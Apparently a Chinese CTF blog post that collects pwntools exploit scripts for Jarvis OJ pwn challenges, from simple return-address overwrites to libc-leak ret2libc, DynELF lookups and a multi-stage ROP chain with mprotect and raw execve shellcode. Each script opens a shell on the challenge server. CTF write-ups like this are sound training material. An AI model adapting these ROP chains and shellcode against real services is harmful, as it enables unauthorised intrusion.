最近做了Jarvis OJ的一部分pwn题,收获颇丰,现在这里简单记录一下exp,分析过程和思路以后再补上

Tell Me Something
此题与level0类似,请参考level0的writeup

http://www.cnblogs.com/WangAoBo/p/7591552.html
 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 elf = ELF('./guestbook')

 good_game_addr = elf.symbols['good_game']

 #  io = process('./guestbook')

 io = remote('pwn.jarvisoj.com', 9876)

 payload = 'A' * 0x88 + p64(good_game_addr)

 io.recvuntil('message:\n')

 io.send(payload)

 print io.recvall()

 io.close()

Smashes

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 flag_addr = 0x400d21

 #  offset = 0x7fffffffcd68 - 0x7fffffffcb50

 #  payload = 'A' * offset + p64(flag_addr)

 payload = p64(flag_addr) * 200

 io = remote('pwn.jarvisoj.com', 9877)

 #  io = process('./smashes')

 io.recvuntil('name? ')

 io.sendline(payload)

 #  io.recvuntil('flag: ')

 io.recv()

 io.sendline()

 io.recv()
Test Your Memory
 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 elf = ELF('./memory')

 win_func_addr = elf.symbols['win_func']

 cat_flag_addr = elf.search('cat flag').next()

 payload = 'A' * (0x13 + 0x4) + p32(win_func_addr) + p32(win_func_addr) + p32(cat_flag_addr)

 #  io = process('./memory')

 io = remote('pwn2.jarvisoj.com', 9876)

 io.recvuntil('> ')

 io.sendline(payload)

 print io.recvall()

 io.close()

[XMAN]level0

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 elf = ELF('./level0')

 callsys_addr = elf.symbols['callsystem']

 #  io = process('./level0')

 io = remote('pwn2.jarvisoj.com', 9881)

 io.recvuntil('World\n')

 payload = 'A' * (0x80 + 0x8) + p64(callsys_addr)

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level1

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 shellcode = asm(shellcraft.i386.linux.sh())

 #  io = process('./level1')

 io = remote('pwn2.jarvisoj.com', 9877)

 text = io.recvline()[14: -2]

 #  print text[14:-2]

 buf_addr = int(text, 16)

 payload = shellcode + 'A' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level2

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 elf = ELF('./level2')

 sys_addr = elf.symbols['system']

 sh_addr = elf.search('/bin/sh').next()

 payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)

 #  io = process('./level2')

 io = remote('pwn2.jarvisoj.com', 9878)

 io.recvuntil('Input:\n')

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level2_x64

level2_x64与level3_x64放在一块分析

http://www.cnblogs.com/WangAoBo/p/7966773.html
 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 elf = ELF('./level2_x64')

 sys_addr = elf.symbols['system']

 sh_addr = elf.search('/bin/sh').next()

 rop = ROP(elf)

 p_rdi_r_addr = rop.rdi[0]

 #  print type(p_rdi_r_addr)

 payload = 'A' * (0x80 + 0x8) + p64(p_rdi_r_addr) + p64(sh_addr) + p64(sys_addr) + p64(0xdeadbeef)

 #  io = process('./level2_x64')

 io = remote('pwn2.jarvisoj.com', 9882)

 io.recvuntil('Input:\n')

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level3

level2_x64与level3_x64放在一块分析

http://www.cnblogs.com/WangAoBo/p/7966773.html
 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 local = 0

 if local:

     io = process('./level3')

     libc = ELF('/lib/i386-linux-gnu/libc.so.6')

 else:

     io = remote('pwn2.jarvisoj.com', 9879)

     libc = ELF('./libc-2.19.so')

 elf = ELF('./level3')

 start_elf_addr = elf.symbols['_start']

 write_elf_addr = elf.symbols['write']

 read_got_addr = elf.got['read']

 read_libc_addr = libc.symbols['read']

 sys_libc_addr = libc.symbols['system']

 sh_libc_addr = libc.search('/bin/sh').next()

 payload = 'A' * (0x88 + 0x04) + p32(write_elf_addr) + p32(start_elf_addr) + p32(0x1) + p32(read_got_addr) + p32(0x4)

 io.recvuntil('Input:\n')

 io.send(payload)

 read_addr = u32(io.recv(4))

 offset = read_addr - read_libc_addr

 sys_addr = offset + sys_libc_addr

 sh_addr = offset + sh_libc_addr

 payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)

 io.recvuntil('Input:\n')

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level3_x64

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 local = 0

 if local:

     io = process('./level3_x64')

     libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

 else:

     io = remote('pwn2.jarvisoj.com', 9883)

     libc = ELF('./libc-2.19.so')

 elf = ELF('./level3_x64')

 start_elf_addr = elf.symbols['_start']

 write_elf_addr = elf.symbols['write']

 read_got_addr = elf.got['read']

 read_libc_addr = libc.symbols['read']

 sys_libc_addr = libc.symbols['system']

 sh_libc_addr = libc.search('/bin/sh').next()

 rop = ROP(elf)

 p_rdi_r_addr = rop.rdi[0]

 p_rsi_r15_r_addr = rop.rsi[0]

 payload = 'A' * (0x80 + 0x8)

 payload += p64(p_rdi_r_addr)

 payload += p64(0x1)

 payload += p64(p_rsi_r15_r_addr)

 payload += p64(read_got_addr)

 payload += p64(0x0)

 payload += p64(write_elf_addr)

 payload += p64(start_elf_addr)

 io.recvuntil('Input:\n')

 io.send(payload)

 read_addr = u64(io.recv(0x8))

 offset = read_addr - read_libc_addr

 sys_addr = offset + sys_libc_addr

 sh_addr = offset + sh_libc_addr

 payload = 'A' * (0x80 + 0x8)

 payload += p64(p_rdi_r_addr)

 payload += p64(sh_addr)

 payload += p64(sys_addr)

 payload += p64(0xdeadbeef)

 io.recvuntil('Input:\n')

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level4

 !/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 #  io = process('./level4')

 io = remote('pwn2.jarvisoj.com', 9880)

 elf = ELF('./level4')

 write_elf_addr = elf.symbols['write']

 start_elf_addr = elf.symbols['_start']

 read_elf_addr = elf.symbols['read']

 bss_addr = elf.bss()

 def leak(addr):

     payload = 'A' * (0x88 + 0x4) + p32(write_elf_addr) + p32(start_elf_addr) + p32(0x1) + p32(addr) + p32(0x4)

     io.send(payload)

     leaked = io.recv(4)

     log.info("leaked -> %s -> 0x%x" % (leaked, u32(leaked)))

     return leaked

 d = DynELF(leak, elf = ELF('./level4'))

 sys_addr = d.lookup('system', 'libc')

 log.info("sys_addr -> 0x%x" % sys_addr)

 payload = 'A' * (0x88 + 0x4) + p32(read_elf_addr) + p32(start_elf_addr) + p32(0x0) + p32(bss_addr) + p32(0x8)

 io.send(payload)

 io.send('/bin/sh\0')

 sh_addr = bss_addr

 payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level5

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 def Debug():

     raw_input("waiting for debug:")

     gdb.attach(io, "b *0x0000000000400618")

 from pwn import *

 context.terminal = ['deepin-terminal', '-x', 'bash', '-c']

 context.log_level = 'debug'

 elf = ELF('./level5')

 rop = ROP(elf)

 p_rdi_r_addr = rop.rdi[0]

 p_rsi_r15_r_addr = rop.rsi[0]

 p_rbx_rbp_r12_r13_r14_r15_r = 0x00000000004006aa

 mov_call = 0x0000000000400690

 local = 0

 if local:

     io = process('./level5')

     libc = ELF('./libc.so.6')

 else:

     io = remote('pwn2.jarvisoj.com', 9884)

     libc = ELF('./libc-2.19.so')

 io.recvuntil('Input:\n')

 log.info("Step 1: leak read_addr")

 read_libc_addr = libc.symbols['read']

 read_got_addr = elf.got['read']

 write_elf_addr = elf.symbols['write']

 vuln_elf_addr = elf.symbols['vulnerable_function']

 payload = 'A' * (0x80 + 0x8)

 payload += p64(p_rdi_r_addr)

 payload += p64(0x1)

 payload += p64(p_rsi_r15_r_addr)

 payload += p64(read_got_addr)

 payload += p64(0x0000)

 payload += p64(write_elf_addr)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 read_addr = u64(io.recv(8))

 io.recvuntil('Input:\n')

 log.info("leaked read_addr -> 0x%x" % read_addr)

 log.info("Step 2: write shellcode 2 bss")

 sh_addr = bss_addr = elf.bss()

 shellcode = "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05"

 payload = 'B' * (0x80 + 0x8)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(read_got_addr)

 payload += p64(len(shellcode) + 1)

 payload += p64(bss_addr)

 payload += p64(0x0)

 payload += p64(mov_call)

 payload += 'C' * (7 * 8)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 io.send(shellcode + '\0')

 io.recvuntil('Input:\n')

 log.info("Step 3: hijack mprotect 2 __gmon_start__")

 mprotect_addr = read_addr - read_libc_addr + libc.symbols['mprotect']

 mprotect_hijack_addr = 0x0000000000600a70

 payload = 'D' * (0x80 + 0x8)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(read_got_addr)

 payload += p64(0x8)

 payload += p64(mprotect_hijack_addr)

 payload += p64(0x0)

 payload += p64(mov_call)

 payload += 'E' * (7 * 8)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 io.send(p64(mprotect_addr))

 io.recvuntil('Input:\n')

 log.info("Step 4: hijack sh/bss 2 __libc_start_main")

 sh_hijack_addr = 0x0000000000600a68

 payload = 'F' * (0x80 + 0x8)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(read_got_addr)

 payload += p64(0x8)

 payload += p64(sh_hijack_addr)

 payload += p64(0x0)

 payload += p64(mov_call)

 payload += 'G' * (7 * 8)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 io.send(p64(sh_addr))

 io.recvuntil('Input:\n')

 log.info("Step 5: fix bss 2 777")

 payload = 'H' * (0x80 + 0x8)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(mprotect_hijack_addr)

 payload += p64(0x7)

 #  payload += p64(len(shellcode) + 1)

 #  payload += p64(sh_hijack_addr)

 payload += p64(0x1000)

 payload += p64(0x00600000)

 payload += p64(mov_call)

 payload += 'I' * (7 * 8)

 payload += p64(vuln_elf_addr)

 #  Debug()

 io.send(payload)

 io.recvuntil('Input:\n')

 log.info("Step 6: execv shllcode")

 payload = 'J' * (0x80 + 0x8)

 #  payload += p64(sh_addr)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(sh_hijack_addr)

 payload += p64(0x0)

 payload += p64(0x0)

 payload += p64(0x0)

 payload += p64(mov_call)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 log.info("Step 7: getshell")

 io.interactive()

 io.close()

Jarvis OJ - 栈系列部分pwn - Writeup的更多相关文章

  1. Jarvis OJ - 软件密码破解-1 -Writeup

    Jarvis OJ - 软件密码破解-1 -Writeup 转载请标明出处http://www.cnblogs.com/WangAoBo/p/7243801.html 记录这道题主要是想记录一下动态调 ...

  2. Jarvis OJ - [XMAN]level1 - Writeup

    Jarvis OJ - [XMAN]level1 - Writeup M4x原创,转载请表明出处http://www.cnblogs.com/WangAoBo/p/7594173.html 题目: 分 ...

  3. Jarvis OJ - class10 -Writeup

    Jarvis OJ - class10 -Writeup 转载请注明出处:http://www.cnblogs.com/WangAoBo/p/7552266.html 题目: Jarivs OJ的一道 ...

  4. Jarvis OJ - DD-Hello -Writeup

    Jarvis OJ - DD-Hello -Writeup 转载请注明出处http://www.cnblogs.com/WangAoBo/p/7239216.html 题目: 分析: 第一次做这道题时 ...

  5. Jarvis OJ - 爬楼梯 -Writeup

    Jarvis OJ - 爬楼梯 -Writeup 本来是想逆一下算法的,后来在学长的指导下发现可以直接修改关键函数,这个题做完有种四两拨千斤的感觉,记录在这里 转载请标明出处:http://www.c ...

  6. Jarvis OJ - Baby's Crack - Writeup

    Jarvis OJ - Baby's Crack - Writeup M4x原创,欢迎转载,转载请表明出处 这是我第一次用爆破的方法做reverse,值得记录一下 题目: 文件下载 分析: 下载后解压 ...

  7. Jarvis OJ部分逆向

    Jarvis OJ部分逆向题解 很久没有写博客了,前天上Jarvis OJ刷了几道逆向,保持了一下感觉.都是简单题目,写个writeup记录一下. easycrackme int __cdecl ma ...

  8. Jarvis OJ - [XMAN]level3 - Writeup——ret2libc尝试

    这次除了elf程序还附带一个动态链接库 先看一下,很一般的保护 思路分析 在ida中查看,可以确定通过read函数输入buf进行溢出,但是并没有看到合适的目标函数 但是用ida打开附带的链接库,可以看 ...

  9. Jarvis OJ - [XMAN]level1 - Writeup——简单shellcode利用

    100分的pwn 简单查看一下,果然还是比较简单的 放到ida中查看一下,有明显的溢出函数,并且在函数中打印出了字符串的地址,并且字符串比较长,没有NX保护 所以我们很容易想到构造shellcode, ...

随机推荐

  1. KD-Tree 学习笔记

    这是一篇又长又烂的学习笔记,请做好及时退出的准备. KD-Tree 的复杂度大概是 \(O(n^{1-\frac{1}{k}})\) \(k\) 是维度 由于网上找不到靠谱的证明,咕了. 会证明之后再 ...

  2. Patter discovery VS clustering

    “pattern driven” (PD) is based on enumerating candidate patterns in a given solution space and picki ...

  3. Minion 主机同步失败问题,全过程

    如果出现以下状态 token也有了 这个是salt-api  说明你salt-api没问题 点击同步主机 查看你产品线管理那里,添加了你这个salt-api没? 配置参考文档 https://gith ...

  4. nohup npm start &启动之后关闭终端程序没有后台运行

    感谢:https://blog.csdn.net/nsj820/article/details/5862231 “在当shell中提示了nohup成功后,还需要按终端上键盘任意键退回到shell输入命 ...

  5. Kubernetes Pod故障归类与排查方法

    Pod概念 Pod是kubernetes集群中最小的部署和管理的基本单元,协同寻址,协同调度. Pod是一个或多个容器的集合,是一个或一组服务(进程)的抽象集合. Pod中可以共享网络和存储(可以简单 ...

  6. Chrome浏览器控制台报Refused to get unsafe header "XXX"的错误

    最近在调试后端下载的接口时在浏览器的控制台中发现了红色的错误信息,例如Refused to get unsafe header "XXX":前端是采用XMLHttpRequest对 ...

  7. css动画 transition

    比如输入框触交渐变 在原来的属性添加 : .form-control{-webkit-transition: all .3s; transition: all .3s;} .form-control: ...

  8. 题解【洛谷P3406】海底高铁

    题面 比较基础的前缀和+差分. 注意开\(\text{long long}\) 直接上代码吧. #include <bits/stdc++.h> #define itn int #defi ...

  9. phpstorm更换主题

    打开PhpStorm,File -- Settings -- Editor -- Color Scheme --General选择你喜欢的风格进行更改,选择完成后单击Apply

  10. 你所不知道的locust

    from locust import HttpLocust, TaskSet, task import uuid, time import logging,json # https://docs.lo ...